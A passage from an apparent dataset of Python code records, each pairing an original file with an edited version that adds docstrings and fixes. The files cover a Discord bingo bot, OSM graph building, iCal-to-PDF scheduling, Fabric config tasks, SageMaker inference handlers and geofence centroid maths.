await bot.stdout.send(f'The current board was generated on {board.getStartDate()} at {board.getStartTime()} UTC.')
@bot.command(name='newboard')
async def newBoard(ctx):
await bot.stdout.send('This will create a new board which discards the old one and can NOT be undone, are you sure? (y/n)')
try:
message = await bot.wait_for('message', check=lambda m: m.author == ctx.author and m.channel == ctx.channel, timeout=30.0)
except asyncio.TimeoutError:
await bot.stdout.send('Response timed out, aborting.')
else:
if (message.content.lower() == 'y'):
await bot.stdout.send('Creating new board...')
global board
board.reset()
await bot.stdout.send(file=discord.File('lib/bingo/BINGOedit.png'))
elif (message.content.lower() == 'n'):
await bot.stdout.send('The old board will be preserved')
else:
await bot.stdout.send('Response not recognized, aborting.') | 0.40251 | 0.105948 |
import osmnx as ox
import networkx as nx
import json
import shapely.wkt
from shapely.geometry import LineString
print('reading previous stage results')
with open('tmp/houseNodes.json', encoding='utf-8') as f:
houseRawNodes=json.load(f)
for house in houseRawNodes:
if type(house['geometry']) == str:
house['geometry'] = shapely.wkt.loads(house['geometry'])
if type(house['toGeometry']) == str:
house['toGeometry'] = shapely.wkt.loads(house['toGeometry'])
G = ox.save_load.load_graphml('tmp_city.graphml')
print('adding edges')
new_edges = []
for house in houseRawNodes:
new_edges.append({
"from": house['closest'],
"to": house['osmid'],
"geometry": LineString([(house['geometry'].x, house['geometry'].y), (house['toGeometry'].x, house['toGeometry'].y)]),
"key": 0,
"107413303": 0,
"name": None,
"highway": "residential",
"oneway": False,
"length": 0,
"highway": "projected_footway",
"ref": None,
"maxspeed": None,
"lanes": None,
"bridge": None,
"junction": None,
"service": None,
"tunnel": None,
"access": None,
"width": None,
})
for edge in new_edges:
G.add_edge(
edge["from"],
edge["to"],
osmid=0,
highway=edge["highway"],
oneway=edge["oneway"],
length=edge["length"],
geometry=edge["geometry"]
)
# add back edge
G.add_edge(
edge["to"],
edge["from"],
osmid=0,
highway=edge["highway"],
oneway=edge["oneway"],
length=edge["length"],
geometry=edge["geometry"]
)
print('adding nodes')
new_nodes = []
for house in houseRawNodes:
new_nodes.append({
"osmid": house['osmid'],
"geometry": house['geometry'],
"tag": house['tag'],
"name": house['name'],
"addr": house['addr'],
"highway": None,
})
for node in new_nodes:
G.add_node(
node["osmid"],
y=node["geometry"].y,
x=node["geometry"].x,
osmid=node["osmid"],
tag=node["tag"],
name=node["name"],
addr=node["addr"]
)
print('saving full graph')
ox.save_load.save_graphml(G, 'city.graphml')
fullGraphDict = {}
for node in G.nodes:
fullGraphDict[node] = G.nodes[node]
with open("../ui/src/graph.json", "w") as fp:
json.dump(fullGraphDict , fp)
print('done') | prepare/5_addFootprintsToGraph.py | import osmnx as ox
import networkx as nx
import json
import shapely.wkt
from shapely.geometry import LineString
print('reading previous stage results')
with open('tmp/houseNodes.json', encoding='utf-8') as f:
houseRawNodes=json.load(f)
for house in houseRawNodes:
if type(house['geometry']) == str:
house['geometry'] = shapely.wkt.loads(house['geometry'])
if type(house['toGeometry']) == str:
house['toGeometry'] = shapely.wkt.loads(house['toGeometry'])
G = ox.save_load.load_graphml('tmp_city.graphml')
print('adding edges')
new_edges = []
for house in houseRawNodes:
new_edges.append({
"from": house['closest'],
"to": house['osmid'],
"geometry": LineString([(house['geometry'].x, house['geometry'].y), (house['toGeometry'].x, house['toGeometry'].y)]),
"key": 0,
"107413303": 0,
"name": None,
"highway": "residential",
"oneway": False,
"length": 0,
"highway": "projected_footway",
"ref": None,
"maxspeed": None,
"lanes": None,
"bridge": None,
"junction": None,
"service": None,
"tunnel": None,
"access": None,
"width": None,
})
for edge in new_edges:
G.add_edge(
edge["from"],
edge["to"],
osmid=0,
highway=edge["highway"],
oneway=edge["oneway"],
length=edge["length"],
geometry=edge["geometry"]
)
# add back edge
G.add_edge(
edge["to"],
edge["from"],
osmid=0,
highway=edge["highway"],
oneway=edge["oneway"],
length=edge["length"],
geometry=edge["geometry"]
)
print('adding nodes')
new_nodes = []
for house in houseRawNodes:
new_nodes.append({
"osmid": house['osmid'],
"geometry": house['geometry'],
"tag": house['tag'],
"name": house['name'],
"addr": house['addr'],
"highway": None,
})
for node in new_nodes:
G.add_node(
node["osmid"],
y=node["geometry"].y,
x=node["geometry"].x,
osmid=node["osmid"],
tag=node["tag"],
name=node["name"],
addr=node["addr"]
)
print('saving full graph')
ox.save_load.save_graphml(G, 'city.graphml')
fullGraphDict = {}
for node in G.nodes:
fullGraphDict[node] = G.nodes[node]
with open("../ui/src/graph.json", "w") as fp:
json.dump(fullGraphDict , fp)
print('done') | 0.109849 | 0.394959 |
import sys
import logging
import argparse
import datetime
import pytz
import numpy as np
from icalendar import Calendar
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import A4, landscape
logger = logging.getLogger(__name__)
local_tz = pytz.timezone('Europe/Stockholm') # beware of daylight saving
def utc_to_local(utc_dt):
local_dt = utc_dt.replace(tzinfo=pytz.utc).astimezone(local_tz)
return local_tz.normalize(local_dt) # .normalize might be unnecessary
def main(args=sys.argv[1:]):
"""
Read an iCal calendar file and convert it to a PDF which is ready to be handed out to students.
Note: locations should be a 3-letter code which is elaborated in the calendar description.
"""
parser = argparse.ArgumentParser()
parser.add_argument("inputfile", help="iCal file from which PDF schedule will be produced.", type=str)
parser.add_argument("-v", "--verbosity", action='count',
help="increase output verbosity",
default=0)
parsed_args = parser.parse_args(args)
if parsed_args.verbosity == 1:
logging.basicConfig(level=logging.INFO)
elif parsed_args.verbosity > 1:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig()
fn_in = parsed_args.inputfile
fn_out = fn_in.replace("ics", "pdf")
with open(fn_in, 'rb') as g:
gcal = Calendar.from_ical(g.read())
c = canvas.Canvas(fn_out, pagesize=landscape(A4))
margin = 50.0 # marin in points
xmax, ymax = np.array(landscape(A4)) - margin
xmin, ymin = np.zeros(2) + margin
dates = []
events = []
for i, _c in enumerate(gcal.walk()):
if _c.name == "VCALENDAR":
calname = _c["X-WR-CALNAME"]
caldesc = _c["X-WR-CALDESC"]
if _c.name == "VEVENT":
logger.info("")
logger.info("{}".format(_c['summary']))
dates.append(_c.decoded('dtstart'))
events.append(_c)
idxarr = np.argsort(dates)
c.setFont('Helvetica', 20)
c.drawString(xmin, ymax - 10, calname)
c.setFont('Helvetica', 6)
c.drawString(xmin + 700, ymax, "Autogenerated")
c.drawString(xmin + 700, ymax - 8, datetime.datetime.now().strftime("%m.%d.%Y-%H:%M"))
c.setFont('Helvetica', 12)
# positions
xoff_date = 0
xoff_start_time = 75
xoff_stop_time = 110
xoff_location = 150
xoff_name = 250
xoff_desc = 550
maxchar = 60 # maximum characters per line
maxchar_desc = 40 # maximum characters per line
ypos = 0
j = 0
for i, idx in enumerate(idxarr):
_c = events[idx]
_name = _c['SUMMARY']
_dt = utc_to_local(_c['DTSTART'].dt)
_start_date = _dt.strftime("%a, %d %b")
_start_time = _dt.strftime("%H:%M")
if "LOCATION" in _c:
_location = _c['LOCATION']
if "DTEND" in _c:
_dt = utc_to_local(_c['DTEND'].dt)
_stop_time = _dt.strftime("%H:%M")
else:
_stop_time = None
if "DESCRIPTION" in _c:
_description = _c['DESCRIPTION']
else:
_description = None
if i == 0:
_start_date_old = _start_date
if _start_date != _start_date_old:
c.line(xmin, ypos-2, xmax, ypos-2)
_start_date_old = _start_date
ypos = ymax - 40 - (j * 14)
if ypos < ymin: # new page and reset counter
c.showPage()
j = 0
ypos = ymax - 40 - (j * 14)
c.drawString(xmin + xoff_date, ypos, _start_date)
c.drawString(xmin + xoff_start_time, ypos, _start_time)
if _stop_time:
c.drawString(xmin + xoff_stop_time, ypos, _stop_time)
if _location:
c.drawString(xmin + xoff_location, ypos, _location[:3])
if len(_name) > maxchar:
import textwrap
lines = textwrap.wrap(_name, maxchar)
j -= 1
for line in lines:
j += 1
ypos = ymax - 40 - (j * 14)
c.drawString(xmin + xoff_name, ypos, line)
else:
c.drawString(xmin + xoff_name, ypos, _name)
if _description:
if len(_description) > maxchar_desc:
import textwrap
lines = textwrap.wrap(_description, maxchar_desc)
j -= 1
for line in lines:
j += 1
ypos = ymax - 40 - (j * 14)
c.drawString(xmin + xoff_desc, ypos, line)
else:
c.drawString(xmin + xoff_name, ypos, _description)
j += 1
j += 2 # more newlines
for line in caldesc.split("\n"):
ypos = ymax - 40 - (j * 14)
c.drawString(xmin, ypos, line)
if ypos < ymin: # new page and reset counter
c.showPage()
j = 0
ypos = ymax - 40 - (j * 14)
j += 1
c.save()
if __name__ == '__main__':
sys.exit(main(sys.argv[1:])) | icalpdf.py | import sys
import logging
import argparse
import datetime
import pytz
import numpy as np
from icalendar import Calendar
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import A4, landscape
logger = logging.getLogger(__name__)
local_tz = pytz.timezone('Europe/Stockholm') # beware of daylight saving
def utc_to_local(utc_dt):
    """Convert a naive-UTC datetime into the configured local timezone."""
    aware_utc = utc_dt.replace(tzinfo=pytz.utc)
    # normalize() re-resolves the DST offset after the timezone shift;
    # likely redundant for astimezone() output, kept for safety.
    return local_tz.normalize(aware_utc.astimezone(local_tz))
def main(args=sys.argv[1:]):
    """
    Read an iCal calendar file and convert it to a PDF which is ready to be
    handed out to students.

    Note: locations should be a 3-letter code which is elaborated in the
    calendar description.

    :param args: command line arguments (defaults to ``sys.argv[1:]``).
    """
    import textwrap  # hoisted: previously imported repeatedly inside the loop

    parser = argparse.ArgumentParser()
    parser.add_argument("inputfile", help="iCal file from which PDF schedule will be produced.", type=str)
    parser.add_argument("-v", "--verbosity", action='count',
                        help="increase output verbosity",
                        default=0)
    parsed_args = parser.parse_args(args)
    if parsed_args.verbosity == 1:
        logging.basicConfig(level=logging.INFO)
    elif parsed_args.verbosity > 1:
        logging.basicConfig(level=logging.DEBUG)
    else:
        logging.basicConfig()
    fn_in = parsed_args.inputfile
    # Only swap the file extension; str.replace("ics", "pdf") would also
    # corrupt names that merely contain "ics" (e.g. "physics.ics").
    if fn_in.endswith(".ics"):
        fn_out = fn_in[:-len(".ics")] + ".pdf"
    else:
        fn_out = fn_in + ".pdf"
    with open(fn_in, 'rb') as g:
        gcal = Calendar.from_ical(g.read())
    c = canvas.Canvas(fn_out, pagesize=landscape(A4))
    margin = 50.0  # margin in points
    xmax, ymax = np.array(landscape(A4)) - margin
    xmin, ymin = np.zeros(2) + margin
    dates = []
    events = []
    # Defaults in case the file lacks the X-WR-* calendar metadata.
    calname = ""
    caldesc = ""
    for _c in gcal.walk():
        if _c.name == "VCALENDAR":
            calname = _c["X-WR-CALNAME"]
            caldesc = _c["X-WR-CALDESC"]
        if _c.name == "VEVENT":
            logger.info("")
            logger.info("{}".format(_c['summary']))
            dates.append(_c.decoded('dtstart'))
            events.append(_c)
    idxarr = np.argsort(dates)  # render events in chronological order
    # Page header.
    c.setFont('Helvetica', 20)
    c.drawString(xmin, ymax - 10, calname)
    c.setFont('Helvetica', 6)
    c.drawString(xmin + 700, ymax, "Autogenerated")
    c.drawString(xmin + 700, ymax - 8, datetime.datetime.now().strftime("%m.%d.%Y-%H:%M"))
    c.setFont('Helvetica', 12)
    # Column x-offsets in points, relative to the left margin.
    xoff_date = 0
    xoff_start_time = 75
    xoff_stop_time = 110
    xoff_location = 150
    xoff_name = 250
    xoff_desc = 550
    maxchar = 60  # maximum characters per line (event name)
    maxchar_desc = 40  # maximum characters per line (description)
    ypos = 0
    j = 0  # logical output row; the y position is derived from it
    for i, idx in enumerate(idxarr):
        _c = events[idx]
        _name = _c['SUMMARY']
        _dt = utc_to_local(_c['DTSTART'].dt)
        _start_date = _dt.strftime("%a, %d %b")
        _start_time = _dt.strftime("%H:%M")
        # Reset optional fields per event; previously _location leaked from
        # the previous event (or raised NameError if the first event had none).
        if "LOCATION" in _c:
            _location = _c['LOCATION']
        else:
            _location = None
        if "DTEND" in _c:
            _dt = utc_to_local(_c['DTEND'].dt)
            _stop_time = _dt.strftime("%H:%M")
        else:
            _stop_time = None
        if "DESCRIPTION" in _c:
            _description = _c['DESCRIPTION']
        else:
            _description = None
        if i == 0:
            _start_date_old = _start_date
        if _start_date != _start_date_old:
            # Horizontal separator whenever the day changes.
            c.line(xmin, ypos - 2, xmax, ypos - 2)
            _start_date_old = _start_date
        ypos = ymax - 40 - (j * 14)
        if ypos < ymin:  # new page and reset counter
            c.showPage()
            # NOTE(review): showPage() resets graphics state; the 12 pt font
            # presumably should be re-set here -- confirm multi-page output.
            j = 0
            ypos = ymax - 40 - (j * 14)
        c.drawString(xmin + xoff_date, ypos, _start_date)
        c.drawString(xmin + xoff_start_time, ypos, _start_time)
        if _stop_time:
            c.drawString(xmin + xoff_stop_time, ypos, _stop_time)
        if _location:
            c.drawString(xmin + xoff_location, ypos, _location[:3])
        if len(_name) > maxchar:
            lines = textwrap.wrap(_name, maxchar)
            j -= 1
            for line in lines:
                j += 1
                ypos = ymax - 40 - (j * 14)
                c.drawString(xmin + xoff_name, ypos, line)
        else:
            c.drawString(xmin + xoff_name, ypos, _name)
        if _description:
            if len(_description) > maxchar_desc:
                lines = textwrap.wrap(_description, maxchar_desc)
                j -= 1
                for line in lines:
                    j += 1
                    ypos = ymax - 40 - (j * 14)
                    c.drawString(xmin + xoff_desc, ypos, line)
            else:
                # Draw short descriptions in the description column; they
                # were previously drawn at xoff_name, over the event name.
                c.drawString(xmin + xoff_desc, ypos, _description)
        j += 1
    j += 2  # more newlines before the calendar description footer
    for line in caldesc.split("\n"):
        ypos = ymax - 40 - (j * 14)
        c.drawString(xmin, ypos, line)
        if ypos < ymin:  # new page and reset counter
            c.showPage()
            j = 0
            ypos = ymax - 40 - (j * 14)
        j += 1
    c.save()
if __name__ == '__main__':
sys.exit(main(sys.argv[1:])) | 0.191479 | 0.246947 |
from unipath import Path
from fabric.api import task, run, env, require, settings, hide, fastprint, get, put, prompt
from fabric.contrib.files import append, sed
from deploy import restart
@task(default=True)
def list():
    """
    List remote configurations.

    Prints the remote settings file (``env.PROJECT.settings``) verbatim.

    NOTE: the task name intentionally shadows the ``list`` builtin so the
    fabric CLI command stays ``config.list``.
    """
    require('PROJECT')
    fastprint(run('cat %(settings)s' % env.PROJECT, quiet=True))
@task
def set(option, value=None):
    """
    Update or create option line from remote settings.ini

        fab production config.set:DEBUG,False

    If value is omitted, a prompt will ask for it. This helps avoid
    problems setting values with $ and alike.

    NOTE: the task name intentionally shadows the ``set`` builtin so the
    fabric CLI command stays ``config.set``.
    """
    if value is None:
        value = prompt('Value: ')
    option = option.upper()
    after = '%s = %s' % (option, value)
    # Remove-then-append keeps at most one line per option in the file.
    remove(option, refresh=False) # remove option if exists.
    append(env.PROJECT.settings, after)
    # sanity check: the exact "OPTION = value" line must now be present.
    assert contains(env.PROJECT.settings, after), 'Config not found: "%s"' % after
    restart()
@task
def remove(option, refresh=True):
    """
    Remove option line from remote settings.ini

    :param option: option name (matched case-insensitively).
    :param refresh: restart services after removing (default True).
    """
    option = option.lower()
    # \s* (not \s+?): assignments written without spaces, e.g. "DEBUG=False",
    # must be matched too; \s+? required at least one whitespace character.
    before = r'^%s\s*=\s*.*' % option
    after = ''
    if contains(env.PROJECT.settings, before, use_re=True):
        sed(env.PROJECT.settings, before, after, backup='', flags='I')
        # Squeeze the blank line left behind by the deletion.
        run(r"tr -s '\n' < %(settings)s > %(settings)s.new && mv %(settings)s{.new,}" % env.PROJECT)
    # sanity check: re-run the same regex match. The previous check used a
    # fixed-string whole-line grep (-Fx) on '%s.*', which could never match,
    # so the assertion always passed vacuously.
    assert not contains(env.PROJECT.settings, before, use_re=True), 'Config found: "%s"' % option
    if refresh:
        restart()
@task
def download():
    """
    Download remote settings.ini.

    The file is saved into the local working directory under its remote
    base name.
    """
    remote_path = env.PROJECT.settings
    local_path = Path(env.lcwd, Path(remote_path).name)
    get(remote_path, local_path)
@task
def upload(config_file):
    """
    Upload a config file to replace remote settings.ini.

    :param config_file: local path of the file to upload.

    NOTE(review): the file is put into ``env.PROJECT.share`` keeping its
    local name -- presumably it must already be named ``settings.ini`` to
    actually replace the remote settings; confirm against callers.
    """
    put(config_file, env.PROJECT.share)
@task()
def add_user_to_htpasswd(username):
    """
    Add username and password to the .htpasswd config file.

    ``htpasswd`` prompts interactively for the password on the remote host.
    """
    require('PROJECT')
    htpasswd_path = '%(share)s/.htpasswd' % env.PROJECT
    # Ensure the file exists before htpasswd appends to it.
    run('touch %s' % htpasswd_path)
    run('htpasswd %s %s' % (htpasswd_path, username))
def contains(filename, text, use_re=False):
'''
Check if a line exists in a file.
'''
flag = '-E -i' if use_re else '-Fx'
with settings(hide('everything'), warn_only=True):
cmd = "grep %s '%s' %s" % (flag, text, filename)
return run(cmd).succeeded | jetpack/config.py | from unipath import Path
from fabric.api import task, run, env, require, settings, hide, fastprint, get, put, prompt
from fabric.contrib.files import append, sed
from deploy import restart
@task(default=True)
def list():
"""
List remote configurations.
"""
require('PROJECT')
fastprint(run('cat %(settings)s' % env.PROJECT, quiet=True))
@task
def set(option, value=None):
"""
Update or create option line from remote settings.ini
fab production config.set:DEBUG,False
If value is omitted, a prompt will ask for it. This helps avoid
problems settings values with $ and alike.
"""
if value is None:
value = prompt('Value: ')
option = option.upper()
after = '%s = %s' % (option, value)
remove(option, refresh=False) # remove option if exists.
append(env.PROJECT.settings, after)
# sanity check
assert contains(env.PROJECT.settings, after), 'Config not found: "%s"' % after
restart()
@task
def remove(option, refresh=True):
"""
Remove option line from remote settings.ini
"""
option = option.lower()
before = '^%s\s+?=\s+?.*' % option
after = ''
if contains(env.PROJECT.settings, before, use_re=True):
sed(env.PROJECT.settings, before, after, backup='', flags='I')
run(r"tr -s '\n' < %(settings)s > %(settings)s.new && mv %(settings)s{.new,}" % env.PROJECT)
# sanity check
assert not contains(env.PROJECT.settings, '%s.*' % option), 'Config found: "%s"' % option
if refresh:
restart()
@task
def download():
"""
Download remote settings.ini.
"""
get(env.PROJECT.settings, Path(env.lcwd, Path(env.PROJECT.settings).name))
@task
def upload(config_file):
"""
Upload a config file to replace remote settings.ini.
"""
put(config_file, env.PROJECT.share)
@task()
def add_user_to_htpasswd(username):
"""
Add username and password to the .htpasswd config file.
"""
require('PROJECT')
filepath = '%(share)s/.htpasswd' % env.PROJECT
run('touch %s' % filepath)
run('htpasswd %s %s' % (filepath, username))
def contains(filename, text, use_re=False):
    '''
    Check if a line exists in a file.

    :param use_re: when True, treat ``text`` as a case-insensitive extended
        regex; otherwise match the whole line as a fixed string.
    '''
    grep_flags = '-E -i' if use_re else '-Fx'
    with settings(hide('everything'), warn_only=True):
        result = run("grep %s '%s' %s" % (grep_flags, text, filename))
    return result.succeeded
import json
import tensorflow as tf
from transformers import DistilBertTokenizer
from datetime import datetime
review_body_column_idx_tsv = 13
classes=[1, 2, 3, 4, 5]
max_seq_length=128
tokenizer = DistilBertTokenizer.from_pretrained('distilbert-base-uncased')
def input_handler(data, context):
    """Pre-process raw TSV request lines into BERT-style feature dicts.

    Args:
        data: iterable of byte strings, one TSV record each.
        context: SageMaker serving context (unused here).

    Returns:
        JSON string of the form ``{"instances": [...]}`` as expected by
        TensorFlow Serving.
    """
    start_time = datetime.utcnow()
    print('input_handler() START: ' + start_time.strftime("%m/%d/%Y, %H:%M:%S"))
    transformed_instances = []
    for instance in data:
        data_str = instance.decode('utf-8')
        data_str_split = data_str.split('\t')
        # Index review_body_column_idx_tsv is only valid when there are at
        # least idx+1 fields, hence strictly greater-than; the previous >=
        # allowed an IndexError on rows with exactly 13 fields.
        if len(data_str_split) > review_body_column_idx_tsv:
            print(data_str_split[review_body_column_idx_tsv])
            text_input = data_str_split[review_body_column_idx_tsv]
            # NOTE(review): pad_to_max_length is deprecated in newer
            # transformers releases; padding='max_length' is the modern
            # spelling -- confirm the pinned transformers version.
            encode_plus_tokens = tokenizer.encode_plus(text_input,
                                                       pad_to_max_length=True,
                                                       max_length=max_seq_length)
            # Convert the text-based tokens to ids from the pre-trained BERT vocabulary
            input_ids = encode_plus_tokens['input_ids']
            # Specifies which tokens BERT should pay attention to (0 or 1)
            input_mask = encode_plus_tokens['attention_mask']
            # Segment Ids are always 0 for single-sequence tasks (or 1 if two-sequence tasks)
            segment_ids = [0] * max_seq_length
            transformed_instances.append({
                "input_ids": input_ids,
                "input_mask": input_mask,
                "segment_ids": segment_ids
            })
    transformed_data = {"instances": transformed_instances}
    end_time = datetime.utcnow()
    print('input_handler() END: ' + end_time.strftime("%m/%d/%Y, %H:%M:%S"))
    print('input_handler() TOTAL TIME: ' + str(end_time - start_time))
    return json.dumps(transformed_data)
def output_handler(response, context):
start_time = datetime.utcnow()
print('output_handler() START: ' + start_time.strftime("%m/%d/%Y, %H:%M:%S"))
response_json = response.json()
log_probabilities = response_json["predictions"]
predicted_classes = []
for log_probability in log_probabilities:
softmax = tf.nn.softmax(log_probability)
predicted_class_idx = tf.argmax(softmax, axis=-1, output_type=tf.int32)
predicted_class = classes[predicted_class_idx]
predicted_classes.append(predicted_class)
predicted_classes_json = json.dumps(predicted_classes)
print(predicted_classes_json)
response_content_type = context.accept_header
end_time = datetime.utcnow()
print('output_handler() END: ' + end_time.strftime("%m/%d/%Y, %H:%M:%S"))
print('output_handler() TOTAL TIME: ' + str(end_time - start_time))
return predicted_classes_json, response_content_type | 09_deploy/wip/src_batch_tsv/inference.py | import json
import tensorflow as tf
from transformers import DistilBertTokenizer
from datetime import datetime
review_body_column_idx_tsv = 13
classes=[1, 2, 3, 4, 5]
max_seq_length=128
tokenizer = DistilBertTokenizer.from_pretrained('distilbert-base-uncased')
def input_handler(data, context):
start_time = datetime.utcnow()
print('input_handler() START: ' + start_time.strftime("%m/%d/%Y, %H:%M:%S"))
transformed_instances = []
for instance in data:
data_str = instance.decode('utf-8')
data_str_split = data_str.split('\t')
# print(len(data_str_split))
if (len(data_str_split) >= review_body_column_idx_tsv):
print(data_str_split[review_body_column_idx_tsv])
text_input = data_str_split[review_body_column_idx_tsv]
tokens = tokenizer.tokenize(text_input)
encode_plus_tokens = tokenizer.encode_plus(text_input,
pad_to_max_length=True,
max_length=max_seq_length)
# Convert the text-based tokens to ids from the pre-trained BERT vocabulary
input_ids = encode_plus_tokens['input_ids']
# Specifies which tokens BERT should pay attention to (0 or 1)
input_mask = encode_plus_tokens['attention_mask']
# Segment Ids are always 0 for single-sequence tasks (or 1 if two-sequence tasks)
segment_ids = [0] * max_seq_length
transformed_instance = {
"input_ids": input_ids,
"input_mask": input_mask,
"segment_ids": segment_ids
}
transformed_instances.append(transformed_instance)
transformed_data = {"instances": transformed_instances}
end_time = datetime.utcnow()
print('input_handler() END: ' + end_time.strftime("%m/%d/%Y, %H:%M:%S"))
print('input_handler() TOTAL TIME: ' + str(end_time - start_time))
return json.dumps(transformed_data)
def output_handler(response, context):
    """Post-process TF Serving predictions into a JSON list of star ratings.

    Args:
        response: requests-style response whose JSON payload carries a
            "predictions" key holding one list of logits per example.
        context: SageMaker serving context; provides the accept header.

    Returns:
        Tuple of (JSON string of predicted classes, response content type).
    """
    start_time = datetime.utcnow()
    print('output_handler() START: ' + start_time.strftime("%m/%d/%Y, %H:%M:%S"))
    response_json = response.json()
    log_probabilities = response_json["predictions"]
    predicted_classes = []
    for log_probability in log_probabilities:
        # argmax is invariant under softmax (a monotonic map), so the
        # per-example softmax pass the original code did is unnecessary.
        # int() makes the tensor usable as a plain list index.
        predicted_class_idx = int(tf.argmax(log_probability, axis=-1, output_type=tf.int32))
        predicted_classes.append(classes[predicted_class_idx])
    predicted_classes_json = json.dumps(predicted_classes)
    print(predicted_classes_json)
    response_content_type = context.accept_header
    end_time = datetime.utcnow()
    print('output_handler() END: ' + end_time.strftime("%m/%d/%Y, %H:%M:%S"))
    print('output_handler() TOTAL TIME: ' + str(end_time - start_time))
    return predicted_classes_json, response_content_type
import json
import math
from google.appengine.api import search
"""
Limitations:
1. Providers can only enter a single territory whose set of points does not result in a radius larger than 250 m. So providers need to enter their territories in a piecemeal fashion.
2. When searching for a latitude and longitude we return all territories whose centre of operations ( as defined by the centroid in the polygon of the territory corners ), is within the maximum radius of a territory. So this means that the territories so returned, are not guaranteed to intersect with the given point, tho they are guaranteed to be within ( or more strictly, to have their centres within ) MAX_TERRITORY_RADIUS of the given point.
"""
import graham_scan
MAX_TERRITORY_RADIUS_M = 250
def computeGeoPtCentroidFromGeoPtCorners( geopt_corners ):
    """Return the GeoPoint centroid of the convex hull of the given corners.

    Pipeline: project to the Mercator plane, take the convex hull, compute
    the polygon centroid, and project the result back to WGS84.
    """
    hull = compute_graham_scan( convert_geopoints_to_planar( geopt_corners ) )
    return convertGoogleBingToWGS84( compute_centroid( hull ) )
def convertWGS84ToGoogleBing( geopt ):
    """
    Project a WGS84 lat/lon GeoPoint onto the Google/Bing spherical-Mercator
    plane, returning planar [x, y] coordinates.

    From: https://alastaira.wordpress.com/2011/01/23/the-google-maps-bing-maps-spherical-mercator-projection/
    We use it to convert between co-ordinate systems, so we can use the
    x, y planar projection to compute centroids.
    """
    longitude = geopt.longitude
    latitude = geopt.latitude
    x = longitude * 20037508.34 / 180
    y = math.log(math.tan((90 + latitude) * math.pi / 360)) / (math.pi / 180)
    y = y * 20037508.34 / 180
    return [ x, y ]
def convertGoogleBingToWGS84( xy ):
    """
    Inverse spherical-Mercator projection: planar [x, y] back to a WGS84
    ``search.GeoPoint`` (latitude, longitude).

    From: https://alastaira.wordpress.com/2011/01/23/the-google-maps-bing-maps-spherical-mercator-projection/
    """
    x, y = xy
    lon = (x / 20037508.34) * 180
    lat = (y / 20037508.34) * 180
    # Undo the Mercator latitude stretch.
    lat = 180/math.pi * (2 * math.atan(math.exp(lat * math.pi / 180)) - math.pi / 2)
    return search.GeoPoint( lat, lon )
def convert_geopoints_to_planar( geopt_corners ):
    """Project each GeoPoint corner onto the planar Mercator grid."""
    return list(map(convertWGS84ToGoogleBing, geopt_corners))
def convert_planars_to_geopoints( planars ):
    """Convert each planar [x, y] pair back into a WGS84 GeoPoint."""
    return list(map(convertGoogleBingToWGS84, planars))
def compute_graham_scan( planars ):
    """
    Attempt to clean the data,
    and simplify it to an approximate shape
    by returning the list of corners
    corresponding to the convex hull of the
    given points.
    It attempts this using the Graham Scan
    ( O(n log n); delegated to the local ``graham_scan`` module ).
    """
    return graham_scan.convex_hull( planars )
def compute_area( planars ):
    """
    Signed area of the polygon given by planar [x, y] pairs, using the
    Shoelace Formula ( http://stackoverflow.com/a/24468019 ).

    The absolute value is deliberately NOT taken: the sign encodes the
    vertex winding (positive for counter-clockwise), which the centroid
    computation relies on.
    """
    total = 0.0
    # Pair every vertex with its successor, wrapping around at the end.
    for (x0, y0), (x1, y1) in zip(planars, planars[1:] + planars[:1]):
        total += x0 * y1 - x1 * y0
    return total / 2.0
def compute_centroid( planars ):
    """
    Centroid of the polygon described by planar [x, y] pairs, via the
    signed-area centroid formula ( http://stackoverflow.com/a/14115494 ).

    The input is expected to be the convex hull (in CCW order) of the
    territory points, as produced upstream by the Graham Scan; using the
    hull trades concave detail for a guarantee that no territory point
    falls outside the bounding circle around this centroid.
    """
    area = compute_area(planars)
    n = len(planars)
    cx = 0.0
    cy = 0.0
    # Accumulate the cross-product-weighted edge midp terms for each
    # consecutive vertex pair, then handle the wrap-around edge.
    for i in range(0, n - 1):
        cross = (planars[i][0] * planars[i + 1][1]) - (planars[i + 1][0] * planars[i][1])
        cx += (planars[i][0] + planars[i + 1][0]) * cross
        cy += (planars[i][1] + planars[i + 1][1]) * cross
    wrap_cross = (planars[n - 1][0] * planars[0][1]) - (planars[0][0] * planars[n - 1][1])
    cx += (planars[n - 1][0] + planars[0][0]) * wrap_cross
    cy += (planars[n - 1][1] + planars[0][1]) * wrap_cross
    cx /= (area * 6.0)
    cy /= (area * 6.0)
    return [ cx, cy ]
def create_geojson( props_dict, geopt_corners ):
return json.dumps( {
"type" : "Feature",
"geometry" : {
"type": "Polygon",
"coordinates": [ [ p.latitude, p.longitude ] for p in geopt_corners ]
},
"properties" : props_dict
} ) | api/geofencesearch.py | import json
import math
from google.appengine.api import search
"""
Limitations:
1. Providers can only enter a single territory whose set of points does not result in a radius larger than 250 m. So providers need to enter their territories in a piecemeal fashion.
2. When searching for a latitude and longitude we return all territories whose centre of operations ( as defined by the centroid in the polygon of the territory corners ), is within the maximum radius of a territory. So this means that the territories so returned, are not guaranteed to intersect with the given point, tho they are guaranteed to be within ( or more strictly, to have their centres within ) MAX_TERRITORY_RADIUS of the given point.
"""
import graham_scan
MAX_TERRITORY_RADIUS_M = 250
def computeGeoPtCentroidFromGeoPtCorners( geopt_corners ):
planars = convert_geopoints_to_planar( geopt_corners )
hull = compute_graham_scan( planars )
centroid = compute_centroid( hull )
return convertGoogleBingToWGS84( centroid )
def convertWGS84ToGoogleBing( geopt ):
"""
This is taken from here: https://alastaira.wordpress.com/2011/01/23/the-google-maps-bing-maps-spherical-mercator-projection/
We use it to convert between co-ordinate systems, so we can use the x, y system ( planar projection ), to compute centroids.
"""
lat, lon = geopt.latitude, geopt.longitude
x = lon * 20037508.34 / 180
y = math.log(math.tan((90 + lat) * math.pi / 360)) / (math.pi / 180)
y = y * 20037508.34 / 180
return [ x, y ]
def convertGoogleBingToWGS84( xy ):
"""
This is taken from here: https://alastaira.wordpress.com/2011/01/23/the-google-maps-bing-maps-spherical-mercator-projection/
We use it to convert between co-ordinate systems, so we can use the x, y system ( planar projection ), to compute centroids.
We convert back to lat long to get our GeoPoints.
"""
x, y = xy[ 0 ], xy[ 1 ]
lon = (x / 20037508.34) * 180
lat = (y / 20037508.34) * 180
lat = 180/math.pi * (2 * math.atan(math.exp(lat * math.pi / 180)) - math.pi / 2)
return search.GeoPoint( lat, lon )
def convert_geopoints_to_planar( geopt_corners ):
return [ convertWGS84ToGoogleBing( p ) for p in geopt_corners ]
def convert_planars_to_geopoints( planars ):
